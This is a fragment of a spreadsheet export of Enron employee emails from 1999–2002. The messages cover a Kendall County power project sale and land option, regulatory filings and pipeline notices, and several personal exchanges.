To: Fred Mitro/HOU/ECT@ECT_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON, Scott Healy/SF/ECT@ECT, Ben _x000D_
Jacoby/HOU/ECT@ECT, Carlos Sole/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Re: PSEG Request  _x000D_
_x000D_
Fred,_x000D_
_x000D_
Sounds "do able".  Please contemplate what would be acceptable as "outs" for _x000D_
them and for us.  A,lso, will you be getting RAC involved soon since we are _x000D_
contemplating a binding agreement in the near future?_x000D_
_x000D_
My best guess is that the LOI will be prepared in house, but I will discuss _x000D_
this with Carlos, and we will advise K &amp; S of their role._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
02/12/2001 01:48 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Rusty Stevens/Corp/Enron@ENRON, Scott Healy/SF/ECT@ECT, Ben _x000D_
Jacoby/HOU/ECT@ECT _x000D_
_x000D_
Subject: PSEG Request_x000D_
_x000D_
Kay:_x000D_
_x000D_
I talked with PSEG this morning.  PSEG would like to negotiate and sign a _x000D_
binding LOI regarding the Kendall project site in Illinois prior to _x000D_
negotiating and executing the Definitive SPA.  The specifics of this LOI are:_x000D_
_x000D_
 PSEG would pay an up-front $300,000 payment to ENA _x000D_
 This payment would be non-refundable unless PSEG discovered a "fatal flaw" _x000D_
in the project (we will have to carefully define this concept)_x000D_
 The binding LOI would establish a date by which the SPA would be executed or _x000D_
PSEG would forfeit the up-front payment_x000D_
 The $2.7 MM balance of the Purchase Price would be due upon closing (signing _x000D_
the SPA and transferring the member interests)._x000D_
_x000D_
I believe that PSEG is getting nervous that we may close on the Kendall LLC _x000D_
with another Buyer before they get their act together._x000D_
_x000D_
Call me to discuss the timing of drafting such an LOI.  I would like to _x000D_
strike on PSEG while they are anxious and motivated.  My goal is to send the _x000D_
LOI to PSEG by Wednesday of this week.  I can work directly with Carolyn if _x000D_
that is the most efficient approach._x000D_
_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 08:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>what are you doing tonight?</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 06:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'alan.comnes@enron.com', 'tom.briggs@enron.com', 'mpalmer@enron.com', 'mary.hain@enron.com', 'susan.mara@enron.com', 'david.parquet@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'mona.petrochko@enron.com', 'sandra.mccubbin@enron.com', 'cynthia.sandherr@enron.com', 'christopher.calger@enron.com', 'karen.denne@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'donna.fulton@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>FERC Staff Investigation Report</t>
  </si>
  <si>
    <t xml:space="preserve">In Staff's report on its investigation of the bulk power markets in the east, _x000D_
the Midwest report notes on page 2-15, Additions to Capacity, that new _x000D_
generation has been added in the Midwest region, and that some market _x000D_
participants believe that developers sited new generation in the Midwest _x000D_
because there were no price caps.  _x000D_
_x000D_
Steve Kean suggested that we refer to this finding in our November 20 _x000D_
comments on the California order and specifically draw the conclusion that no _x000D_
price caps leads to more generation development._x000D_
_x000D_
The Midwest report is attached.  Please let me know if you have any questions._x000D_
_x000D_
Sarah_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 07:26:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>i love you baby_x000D_
_x000D_
dq</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 08:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Nordstrom land option (Kendall County, IL)</t>
  </si>
  <si>
    <t xml:space="preserve">You go girl._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kathleen Carnahan                           12/06/2000 03:58 PM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Nordstrom land option (Kendall County, IL)_x000D_
_x000D_
FYI_x000D_
---------------------- Forwarded by Kathleen Carnahan/NA/Enron on 12/06/2000 _x000D_
03:56 PM ---------------------------_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
12/06/2000 03:49 PM_x000D_
To: Kathleen Carnahan/NA/Enron@Enron_x000D_
cc: Ben Jacoby/HOU/ECT@ECT, Rusty Stevens/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Nordstrom land option (Kendall County, IL)_x000D_
_x000D_
Kathleen:_x000D_
_x000D_
The reason for acquiring this option is that Ms. Nordstrom's property is _x000D_
approximately 1000 feet from the eastern boundary of the project site.  At _x000D_
this distance, the home represents a potential sound receptor for ENA's _x000D_
Kendall County development project.  Of course, this is information that _x000D_
should not be communicated to non-Enron personnel._x000D_
_x000D_
Here are the terms which I would like to incorporate into the first draft of _x000D_
the Option Purchase Agreement between Ms. Ann Nordstrom (Optionee) and _x000D_
Kendall New Century Development Company, L.L.C. (Optionor):_x000D_
_x000D_
1.  I would like to use the Fehr Agreement as a template for the Nordstrom _x000D_
Agreement (including the "Triggering event" language)_x000D_
2.  The term of the Option should be for 12 months, with language providing _x000D_
for 4 subsequent 12 month extensions.  Each extension would require an _x000D_
extension payment to Optionee  (Let's leave this blank - I expect this to be _x000D_
the same or close to the up-front option premium amount)_x000D_
3.  I would like to leave the option premium blank (I expect it to be in the _x000D_
$15-25K range)_x000D_
4.  I would like to leave the purchase price blank (I expect it to be in the _x000D_
$200K - $250K range)_x000D_
5.  I would like to include language that ensures that the Optionee _x000D_
(Nordstrom) has the ability to sell the property during the option term (or _x000D_
subsequent extensions thereof), provided that Optionor's right to purchase _x000D_
transfers with the property to the new Owner (Please confirm the legal _x000D_
feasibility of this requirement with me ASAP)_x000D_
6.  The physical address of the property (approximately 2.3 acres) and home _x000D_
is:_x000D_
 2013 Beecher Road_x000D_
 Plano, Illinois_x000D_
 60545_x000D_
7.  One issue that I am concerned about is maintaining confidentiality of the _x000D_
option terms with potential buyers of the Nordstrom property.  Let's discuss _x000D_
this issue in greater detail._x000D_
_x000D_
As you are aware, Ms. Nordstrom's husband recently passed away after a _x000D_
lengthy illness and she is in an emotionally anxious state of mind.  She has _x000D_
placed her property and home on the market for $220K  and she is planning to _x000D_
close on a new home during the month of December.  My goal is to secure an _x000D_
option on her property prior to her selling the home to a non-cooperative _x000D_
Buyer.  We need to make sure we exercise the necessary sensitivity and _x000D_
respect while dealing with Ms. Nordstrom._x000D_
_x000D_
Let me know on the timing of preparing this draft.  I would like to forward _x000D_
the draft to Ms. Nordstrom's attorney by Friday of this week._x000D_
_x000D_
Thanks,_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 09:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Edison Deal Sets High Legislative Hurdle for Davis</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 05/15/2001 02:57 PM -----_x000D_
_x000D_
	"Chris Micheli" &lt;cmicheli@carpentersnodgrass.com&gt;_x000D_
	05/15/2001 07:08 AM_x000D_
		 _x000D_
		 To: "Susan McCabe" &lt;smccabe@mccabeandcompany.net&gt;, "Sue Mara" _x000D_
&lt;smara@enron.com&gt;, "Steven Kelley" &lt;steven@iepa.com&gt;, "Steve Ponder" _x000D_
&lt;steve_ponder@fpl.com&gt;, "Stephanie Newell" _x000D_
&lt;stephanie-newell@reliantenergy.com&gt;, "Scott Sadler" _x000D_
&lt;sadlersa@earthlink.net&gt;, "Scott Govenar" &lt;sgovenar@govadv.com&gt;, "Sandi _x000D_
McCubbin" &lt;smccubbi@enron.com&gt;, "Ron Tom" &lt;rtom@govadv.com&gt;, "Roger Pelote" _x000D_
&lt;roger.pelote@williams.com&gt;, "Robert Ross" &lt;robbiz@cwo.com&gt;, "Rina Venturini" _x000D_
&lt;rventurini@teamgsi.net&gt;, "Richard Hyde" &lt;rwhyde@duke-energy.com&gt;, "Rachel _x000D_
King" &lt;rachel.king@elpaso.com&gt;, "Phil Isenberg" &lt;isenberg@hmot.com&gt;, "Mike _x000D_
Monagan" &lt;mrmonagan@aol.com&gt;, "Maureen O'Haren" &lt;oharen@hmot.com&gt;, "Marie _x000D_
Moretti" &lt;mmoretti@mccabeandcompany.net&gt;, "Lynn Lednicky" &lt;lale@dynegy.com&gt;, _x000D_
"Kent Palmerton" &lt;kent.palmerton@williams.com&gt;, "Katie Kaplan" _x000D_
&lt;kaplan@iepa.com&gt;, "Kassandra Gough" &lt;kgough@calpine.com&gt;, "Julee Ball" _x000D_
&lt;jmball@ns.net&gt;, "John Stout" &lt;john_h_stout@reliantenergy.com&gt;, "John Larrea" _x000D_
&lt;john.g.larrea@williams.com&gt;, "Joe Ronan" &lt;joer@calpine.com&gt;, "Jeff Dasovich" _x000D_
&lt;jeff.dasovich@enron.com&gt;, "Jean Munoz" &lt;jmunoz@mcnallytemple.com&gt;, "Jan _x000D_
Smutny Jones" &lt;smutny@iepa.com&gt;, "Jack Pigott" &lt;jackp@calpine.com&gt;, "Hedy _x000D_
Govenar" &lt;hgovenar@govadv.com&gt;, "Greg Blue" &lt;gtbl@dynegy.com&gt;, "Delaney _x000D_
Hunter" &lt;dhunter@s-k-w.com&gt;, "Chuck Cole" &lt;ccole@advocation-inc.com&gt;, "Bev _x000D_
Hansen" &lt;bhansen@lhom.com&gt;, "Anne Kelly" &lt;kelly@hnks.com&gt;, "Andy Brown" _x000D_
&lt;abb@eslawfirm.com&gt;, "John Norwood" &lt;janorwood@norped.com&gt;, "Pete Conaty" _x000D_
&lt;pcaceo@pacbell.net&gt;, "Matt Kilroy" &lt;matt.kilroy@pge-corp.com&gt;, "Cary Rudman" _x000D_
&lt;cjrudman@softcom.net&gt;, "Carolyn McIntyre" &lt;cmcintyre@sempra.com&gt;, "Barbara _x000D_
LeVake" &lt;blevake@syix.com&gt;, "Paula Soos" &lt;psoos@covantaenergy.com&gt;, "Pat _x000D_
Pape" &lt;ppape@calpine.com&gt;, "Mohammed Alrai" &lt;mohammeda@calpine.com&gt;, "Kent _x000D_
Robertson" &lt;kentr@calpine.com&gt;, "Katherine Potter" &lt;katherip@calpine.com&gt;, _x000D_
"Juan Rodriguez" &lt;juanr@calpine.com&gt;, "Eileen Koch" &lt;eileenk@calpine.com&gt;, _x000D_
"Bill Highlander" &lt;highlander@calpine.com&gt;, "Aymee Ramos" &lt;aymeer@calpine.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Edison Deal Sets High Legislative Hurdle for Davis_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
_x000D_
?http://www.latimes.com/news/state/20010515/t000040864.html_x000D_
 - Edison Deal Sets High Legislative Hurdle for Davis.url</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 20:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pam,_x000D_
_x000D_
Another team:_x000D_
_x000D_
Elena Chilkina_x000D_
Robert J. Guadette_x000D_
Joseph Helms_x000D_
Kenneth Jett_x000D_
Todd Litton_x000D_
MarK Westmoreland_x000D_
_x000D_
_x000D_
Grade:  A-_x000D_
_x000D_
_x000D_
Vince Kaminski</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 09:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dan.leff@enron.com', 'harry.arora@enron.com'})</t>
  </si>
  <si>
    <t>Demand buy-down proposal</t>
  </si>
  <si>
    <t xml:space="preserve">As we discussed....... as much flesh as we can put on this by midday _x000D_
tommorrow would be quite helpful. I would think there are significant _x000D_
aggregation opportunities available to us once this is implemented. Let me _x000D_
know what else you need from me. Thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 May 2000 13:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rainslie@isda.org'})</t>
  </si>
  <si>
    <t>FW: H.R. 4541</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;CEAexplanationfinal5-24-00.doc&gt;&gt;  &lt;&lt;EWING_026.PDF&gt;&gt;_x000D_
 Here is the Ewing Bill and Ewing's statement._x000D_
_x000D_
-----Original Message-----_x000D_
From: Weston, Ryan_x000D_
To: 'rainslie@isda.org'; 'mtsmithson@wms-jen.com'_x000D_
Sent: 5/25/00 6:50 PM_x000D_
Subject: FW: H.R. 4541_x000D_
_x000D_
please forward to Mary Whalen_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:  Weston, Ryan_x000D_
&gt; Sent: Thursday, May 25, 2000 6:25 PM_x000D_
&gt; To: 'Larry.Decker@do.treas.gov'; 'patrick.m.parkinson@frb.gov';_x000D_
&gt; 'CarterC@sec.gov'; 'bgreenwood@cftc.gov'; Walter_Lukken@agriculture._x000D_
&gt; senate. gov (E-mail); Ebersole, Dave; Riley, John_x000D_
&gt; Subject: H.R. 4541_x000D_
&gt;_x000D_
&gt;  &lt;&lt;CEAexplanationfinal5-24-00.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  &lt;&lt;EWING_026.PDF&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 &lt;&lt;CEAexplanationfinal5-24-00.doc&gt;&gt;  &lt;&lt;EWING_026.PDF&gt;&gt;_x000D_
_x000D_
 - CEAexplanationfinal5-24-00.doc_x000D_
 - EWING_026.PDF</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 02:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sandy.stone@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'yan.jin@enron.com'})</t>
  </si>
  <si>
    <t>Re: Recall: Reply Requested: Do You Code Or Approve Invoices?</t>
  </si>
  <si>
    <t xml:space="preserve">PLEASE REMOVE ME FROM THIS DISTRIBUTION LIST AS THIS IS THE EIGHTH ONE I'VE _x000D_
RECEIVED THIS MORNING.  THANK YOU._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Yan Jin@ENRON COMMUNICATIONS_x000D_
	04/11/01 09:24 AM_x000D_
		_x000D_
		 To: Chad Landry/HOU/ECT@ECT@ENRON_x000D_
		 cc: All Enron Employees United States@ENRON, _x000D_
IMCEANOTES-iBuyit+40ENRON@ENRON.com@ECT@ENRON, Sheila A _x000D_
Knudsen/ENRON@enronXgate_x000D_
		 Subject: Re: Recall: Reply Requested: Do You Code Or Approve Invoices?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Jul 1999 05:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'clay.roesler@enron.com', 'ron.beidelman@enron.com', 'kyle.purvis@enron.com', 'ruth.jensen@enron.com', 'david.ayers@enron.com', 'cheryl.dawson@enron.com', 'david.parham@enron.com', 'don.stevens@enron.com', 'butch.russell@enron.com', 'leo.nichols@enron.com', 'larry.campbell@enron.com', 'ron.harkrader@enron.com', 'ken.crowl@enron.com', 'william.kendrick@enron.com', 'allan.weatherford@enron.com', 'rick.cates@enron.com', 'rick.loveless@enron.com', 'mike.riedel@enron.com', 'michael.terraso@enron.com'})</t>
  </si>
  <si>
    <t>Area Source MACT Regulations</t>
  </si>
  <si>
    <t>EPA released their urban strategy for their Air Toxics Program, and they _x000D_
listed reciprocating engines as an area source they plan on regulated under _x000D_
the MACT regulations for formaldehyde. As you know, an area source is a _x000D_
location that emits less than 10 tons of any one Hazardous Air Pollutant _x000D_
(HAP) or 25 tons/year of all HAPs. This was a big surprise to industry. _x000D_
_x000D_
As expected they also listed oil and gas production as an area source they _x000D_
plan on regulating, but did not list transmission and storage dehydration, or _x000D_
turbines. They will regulate major sources for HAPs in all of these _x000D_
categories._x000D_
_x000D_
Marc</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 11:20:11 -0800 (PST)</t>
  </si>
  <si>
    <t>um excuse me sir, but i think that you stood me up twice and you never call me back.  so i just decided to stop being part of your enterage.  wade and i are trying to work through things, but i guess that we are getting along a little better.  we have one more hole in our wall and i haven't broken any phones lately so i guess that is a good sign.  we still have a long way to go.  so why haven't i heard from you little one?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, February 05, 2002 1:14 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
i do but i havent heard from you either, how are things with wade_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, February 05, 2002 1:11 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
nope.  i am in the old building on the 32nd floor.  i think that is where we all used to be.  it is depressing over here.  and we are actually having to work.  i miss being over there.  so, why don't you talk to me anymore?  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, February 05, 2002 1:09 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
i cant figure that out yet, are you still on the 5th floor_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, February 05, 2002 1:01 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
not much.  just over here working on the estate, which is so much fun!  how about you?  do you think that you are going to like ubs?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, February 05, 2002 12:54 PM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
we are so so, what have you been up to, i was in the cafeteria,_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, February 05, 2002 12:34 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
were you in the cafeteria earlier?  i thought that i saw you, but it was from far away.  how are you and sarah doing?</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 12:56:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scott.loving@enron.com', 'robert.ramirez@enron.com', 'joann.collins@enron.com', 'kevin.alvarado@enron.com', 'cynthia.franklin@enron.com', 'robert.superty@enron.com', 'scott.goodell@enron.com', 'tamara.carter@enron.com', 'scott.neal@enron.com', 'w..pereira@enron.com', 'steve.gillespie@enron.com', 'l..dinari@enron.com', 'l..kelly@enron.com', 'chris.germany@enron.com', 'jesse.villarreal@enron.com', 'clarissa.garcia@enron.com', 'f..smith@enron.com'})</t>
  </si>
  <si>
    <t>FW: CAPACITY ALLOC-TIMELY NOMINATION CYCLE FOR JUNE 9-11, 2001</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	navigator@nisource.com@ENRON [mailto:IMCEANOTES-navigator+40nisource+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Friday, June 08, 2001 10:03 AM_x000D_
To:	navigator@nisource.com_x000D_
Subject:	CAPACITY ALLOC-TIMELY NOMINATION CYCLE FOR JUNE 9-11, 2001_x000D_
_x000D_
_x000D_
                      COLUMBIA GAS TRANSMISSION CORPORATION_x000D_
                        NOTICE TO ALL INTERESTED PARTIES_x000D_
                                  JUNE 08, 2001_x000D_
_x000D_
Notice ID: 2790_x000D_
5 - NO RESPONSE REQUIRED_x000D_
_x000D_
SUBJECT: CAPACITY ALLOCATION-TIMELY NOMINATION CYCLE FOR JUNE 9-11, 2001_x000D_
         PLEASE NOTE THAT ALL ALLOCATIONS ARE SUBJECT TO CHANGE BASED ON THE_x000D_
         RECEIPT OF ANY NEW NOMINATIONS OR INTRADAY NOMINATIONS._x000D_
_x000D_
RECEIPT:_x000D_
_x000D_
LEBANON AGGREGATE:_x000D_
_x000D_
JUNE 9, 2001:  There is no capacity for new IPP customers. IPP customers_x000D_
nominating increases received 107.493% of their June 8, 2001 flowing volumes or_x000D_
their June 9, 2001 nominated quantities, whichever was less._x000D_
_x000D_
JUNE 10, 2001:  There is no capacity for new IPP customers.  IPP customers_x000D_
nominating increases received 101.034% of their June 9, 2001 flowing volumes or_x000D_
their June 10, 2001 nominated quantities, whichever was less._x000D_
_x000D_
JUNE 11, 2001:  There is no capacity for new IPP customers.  IPP customers_x000D_
nominting increases received 108.29% of their June 10, 2001 flowing volumes or_x000D_
their June 11, 2001 nominated quantities, whichever was less._x000D_
_x000D_
Excess MDWQ               Available +_x000D_
ISS Withdrawals           Available_x000D_
SIT Withdrawals           Available_x000D_
Imbalance Drawdowns       Available_x000D_
PAL Lends/Unparks         Available_x000D_
_x000D_
Excess MDIQ               Available +_x000D_
ISS Injections            Available_x000D_
SIT Injections            Available_x000D_
Imbalance Paybacks        Available_x000D_
PAL Parks/Loan Paybacks   Available_x000D_
_x000D_
+ Call Gas Control 24 hours in advance at (304) 357-2606 to request approval._x000D_
_x000D_
Columbia Gas Transmission has completed allocating all of its receipt and_x000D_
delivery points for the gas days of June 9-11, 2001.  You may now view the_x000D_
quantities you are authorized to flow on June 9-11, 2001.  On the Internet_x000D_
NAVIGATOR, view Nominations, Scheduled Quantity, Scheduled Quantity for Service_x000D_
Requestor-Summary, Nominations to be Viewed, and select Reduced Nominations._x000D_
The quantities confirmed to flow for your account are available on the Internet_x000D_
NAVIGATOR after 5:30 p.m. Eastern Time on Friday, June 8, 2001._x000D_
_x000D_
If you have any questions, please contact your Account Representative.</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 02:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marde.driscoll@enron.com'})</t>
  </si>
  <si>
    <t>Re: Peoples</t>
  </si>
  <si>
    <t xml:space="preserve">OK.  Different now.  Is it ok if I send Lexi her own thank you card?  I going _x000D_
to try and print a picture of the cows to send with it._x000D_
_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Peoples  _x000D_
_x000D_
Thanks!  How are you doing?  m_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany@ECT_x000D_
08/21/2000 09:27 AM_x000D_
To: Marde L Driscoll/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: Peoples  _x000D_
_x000D_
We sold directly to Clinton for the term of our deals.  Clinton (Latrove) _x000D_
should have pulled directly from Power Gas Marketing's pool.  The Power Gas _x000D_
Marketing supply deal ends Oct 31st and the local production deal ends Nov _x000D_
30th and then we will be out of the local production business.  We've tried _x000D_
to tell everyone but I bet you still get phonecalls until we are out of it.  _x000D_
Sorry._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Christina Bangle/HOU/EES@EES _x000D_
Subject: Re: Peoples_x000D_
_x000D_
Did we end up doing this deal or did you sell directly to Clinton?  I'm _x000D_
thinking that you sold directly to Clinton....  Let me know.  Thanks!  md_x000D_
---------------------- Forwarded by Marde L Driscoll/HOU/EES on 08/16/2000 _x000D_
03:45 PM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany@ECT_x000D_
06/22/2000 07:40 AM_x000D_
To: Marde L Driscoll/HOU/EES@EES_x000D_
cc: Alain Diza/HOU/EES@EES, Heidi Griffith/DUB/EES@EES, Dick _x000D_
Jenkins/HOU/ECT@ECT, Nelson Ferries/Corp/Enron@ENRON@ECT, Mary Theresa _x000D_
Franklin/HOU/ECT@ECT, John M Singer/Corp/Enron@ENRON _x000D_
Subject: Re: Peoples  _x000D_
_x000D_
Paul is out of the office today but I found the customer name in my notes - _x000D_
it was right below all my notes on CanFibre.  The customer is Latrove Steel.  _x000D_
I'm going to call Peoples myself to learn how this works.  Does anyone object _x000D_
to that?  I will wait until this afternoon before I call._x000D_
_x000D_
Heidi_x000D_
Do you think the production gas can be moved to EES's pool by July 1st?  If _x000D_
not, we can sell the gas to Latrove out of CES's pool for July.  However, we _x000D_
will not see the fuel credit until August(???) to verify if this works or not._x000D_
_x000D_
_x000D_
_x000D_
Marde L Driscoll@EES_x000D_
06/21/2000 08:29 PM_x000D_
To: John M Singer/Corp/Enron@ENRON@ECT, Chris Germany/HOU/ECT@ECT_x000D_
cc: Alain Diza/HOU/EES@EES, Heidi Griffith/DUB/EES@EES, Dick _x000D_
Jenkins/HOU/ECT@ECT, Nelson Ferries/Corp/Enron@ENRON@ECT, Mary Theresa _x000D_
Franklin/HOU/ECT@ECT _x000D_
Subject: Re: Peoples  _x000D_
_x000D_
Questions that I have:_x000D_
1)  I am assuming that the Clinton end-user will not go into EESs' pool.  It _x000D_
needs to be verified with PNG that I can do a pool to pool nomination to the _x000D_
end-user (only a few stand alone customers are grandfathered to receive these _x000D_
types of noms.)  This is a critical issue for EES as we are already long gas _x000D_
behind the gate and we don't need more production.  If the customer can't _x000D_
take my gas from my pool then I will have to bring it in via CNG which will _x000D_
only make my pool longer._x000D_
_x000D_
2)  If the production meters are moved to EESs' pool then I would suggest _x000D_
just a flat index price between ENA and EES._x000D_
_x000D_
3)  Will EES be supplying the full 1000/d to the end-user or just the amount _x000D_
of the local production transferred to EESs' pool?  _x000D_
_x000D_
4)  If the fuel credit works the way Chris explains it below then I would be _x000D_
willing to sell all of the gas at index but I will need to confirm that with _x000D_
PNG._x000D_
_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Marde L Driscoll/HOU/EES@EES@ECT, Alain Diza/HOU/EES@EES@ECT, Heidi _x000D_
Griffith/DUB/EES@EES@ECT, Dick Jenkins/HOU/ECT@ECT, Nelson _x000D_
Ferries/Corp/Enron@ENRON, Mary Theresa Franklin/HOU/ECT@ECT _x000D_
Subject: Re: Peoples  _x000D_
_x000D_
1. ENA is responsible for purchases of 500 MCFD (515 DthD) Metered Prouction _x000D_
from Phillips Production Company.  This volume is will be decreased  until _x000D_
further notice because PNG has increased line pressures thus reducing the _x000D_
production volumes to 50-60% of normal (Refer to attached schedule).  There _x000D_
are 7 Phillips meters  in CES's pool beginning July 2000.  Heidi Boyd @ CES _x000D_
will have to nominate the production into CES's pool and away from the pool _x000D_
until the meters are moved.  EES should have 6 Phillips Production meters in _x000D_
their pool beginning July 2000._x000D_
_x000D_
2.  See Attached Schedule for Term, Price &amp; Volume.  _x000D_
_x000D_
_x000D_
Note:  PNG has increased line pressures which reduces production into the _x000D_
system.  Both Phillips Production and Power Gas Marketing are claiming Force _x000D_
Majeure.  Their volumes have been reduced to 50-60% of the original contractd _x000D_
volume._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris Germany@ECT_x000D_
06/20/2000 03:59 PM_x000D_
To: John M Singer/Corp/Enron@ENRON, Marde L Driscoll/HOU/EES@EES, Alain _x000D_
Diza/HOU/EES@EES, Heidi Griffith/DUB/EES@EES_x000D_
cc: Dick Jenkins/HOU/ECT@ECT _x000D_
_x000D_
Subject: Peoples_x000D_
_x000D_
Here is what I'm looking at for July 1.  Paul Leanza (Clinton) has a customer _x000D_
that can take around 1,000 day.  I don't know if that's dt or mcf.  I will _x000D_
use mcf for this email until someone corrects me.  This customer has a _x000D_
special deal where the pool operator gets a fuel credit on every mcf the _x000D_
customer pulls.  For July, assuming the gathering fuel is 5%, and this _x000D_
customer pulls 95 mcf from your production pool, you will get a 5 mcf _x000D_
credited back to your imbalance account the following month.  I don't know _x000D_
how this works with trading imbalances.  But, at a NYMX of $3.95 that works _x000D_
out to $.21 - sounds good to me.  Paul said this customer is looking for a _x000D_
CNG Index Flat price or and equivalent basis number.  Marde will not sell at _x000D_
that price but I will._x000D_
_x000D_
Marde said she would charge ENA a $.03 fee for all the volumes flowing.  _x000D_
Actually, I would prefer to move all the pool and production gas to EES, _x000D_
settle up financially with EES and be done with it.  What we could do to test _x000D_
Paul's statement, is have the customer pull 300 mcf/day out of CES's pool for _x000D_
July.  It would be easy to see since that is the only deal.   AND, have EES _x000D_
take over the pool deal with Power Gas Marketing.  Comments / Questions?_x000D_
_x000D_
Questions_x000D_
John_x000D_
1.  Heidi (EES) said you already have some Phillips production in EES's _x000D_
pool.  Does CES still have metered production from Phillips in CES's pool?  _x000D_
If yes, how many meters?_x000D_
_x000D_
2.  Please give me the following info for the activity behind Peoples_x000D_
  Phillips   Power Gas Marketing_x000D_
Term_x000D_
Price_x000D_
Volume_x000D_
_x000D_
Heidi (EES)_x000D_
If we find out from John that there is still metered production in CES's _x000D_
pool, please call Peoples and see if we can move the metered production to _x000D_
EES's pool for July.  Heidi Boyd with CES said you could tell them that CES _x000D_
is going out of business and they may make exceptions for that._x000D_
_x000D_
Marde_x000D_
I would prefer to move both supply customers over to EES, where EES makes the _x000D_
payments and bills either Clinton or Clinton's customer.  At what price will _x000D_
you take these deals?  I assume we need to get this info from John before you _x000D_
can anwser this._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 06/20/2000 02:51 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  John M Singer @ ENRON                           06/19/2000 01:52 PM_x000D_
	_x000D_
_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Peoples  _x000D_
_x000D_
As of today, Power Gas Marketing volume has decreased from 7,500 per month to _x000D_
4,000 per month, until further notice, due to Peoples regulating the volume _x000D_
of production into their system._x000D_
_x000D_
